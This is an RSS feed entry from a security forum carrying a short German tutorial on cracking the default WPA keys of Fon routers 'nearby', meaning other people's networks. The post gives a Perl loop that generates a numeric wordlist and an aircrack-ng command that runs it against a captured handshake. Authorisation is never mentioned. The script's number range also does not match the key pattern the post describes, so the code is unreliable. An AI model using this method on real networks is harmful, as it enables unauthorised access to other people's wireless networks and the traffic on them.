<?xml version="1.0" encoding="ISO-8859-1"?>

<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/">
	<channel>
		<title>Remote Exploit Forums - Tutorials und Howtos</title>
		<link>http://forums.remote-exploit.org/</link>
		<description />
		<language>en</language>
		<lastBuildDate>Sat, 21 Nov 2009 05:11:48 GMT</lastBuildDate>
		<generator>vBulletin</generator>
		<ttl>60</ttl>
		<image>
			<url>http://forums.remote-exploit.org/images/backtrack4/misc/rss.jpg</url>
			<title>Remote Exploit Forums - Tutorials und Howtos</title>
			<link>http://forums.remote-exploit.org/</link>
		</image>
		<item>
			<title><![CDATA[Video "How to Bruteforce a nearby WPA Fon Router"]]></title>
			<link>http://forums.remote-exploit.org/tutorials-und-howtos/27996-video-how-bruteforce-nearby-wpa-fon-router.html</link>
			<pubDate>Sat, 24 Oct 2009 13:36:05 GMT</pubDate>
			<description><![CDATA[In diesem Tutroial geht es darum, wie ein Fon Router zu knacken ist, die Schwachstelle liegt hierbei an den "Standard" WPA Keys die bei der...]]></description>
			<content:encoded><![CDATA[<div>In diesem Tutroial geht es darum, wie ein Fon Router zu knacken ist, die Schwachstelle liegt hierbei an den &quot;Standard&quot; WPA Keys die bei der Auslieferung des Fon's gesetzt sind.<br />
<br />
In der Praxis sind diese meistens nur Zahlen meistens mit 870250xxxxx. Im Klartext bedeutet dies, dass sich nur die letzten 5 Ziffern ändern. Ein Programm das uns genau eine Textdatei mit allen Möglichkeiten hab ich hier:<br />
<br />
<div style="margin:20px; margin-top:5px">
	<div class="smallfont" style="margin-bottom:2px">Code:</div>
	<hr /><code style="margin:0px" dir="ltr" style="text-align:left">#!/usr/bin/perl<br />
$n = 8702000000;<br />
while ($n &lt;= 8702555555) { system (&quot;echo $n &gt;&gt; numbers.txt&quot;); $n++; }</code><hr />
</div>So, dann wird eine Textdatei erstellt, die Ihr dann mit hilfe von Aircrack und dem WPA handshake des Routers verwenden könnt.<br />
<br />
aircrack-ng fon-01.cap -w /root/fon/numbers.txt<br />
<br />
Das wars auch schon :) hoffe es hilft dem ein oder anderen irgendwie weiter.<br />
<br />
Link zum Video <br />
<br />
<a href="http://www.youtube.com/watch?v=k_RYsi1yxC4" target="_blank">YouTube - How to Bruteforce a nearby WPA Fon Wlan [3]</a><br />
<br />
mfg Reeth</div>

]]></content:encoded>
			<category domain="http://forums.remote-exploit.org/tutorials-und-howtos/">Tutorials und Howtos</category>
			<dc:creator>Reeth</dc:creator>
			<guid isPermaLink="true">http://forums.remote-exploit.org/tutorials-und-howtos/27996-video-how-bruteforce-nearby-wpa-fon-router.html</guid>
		</item>
	</channel>
</rss>
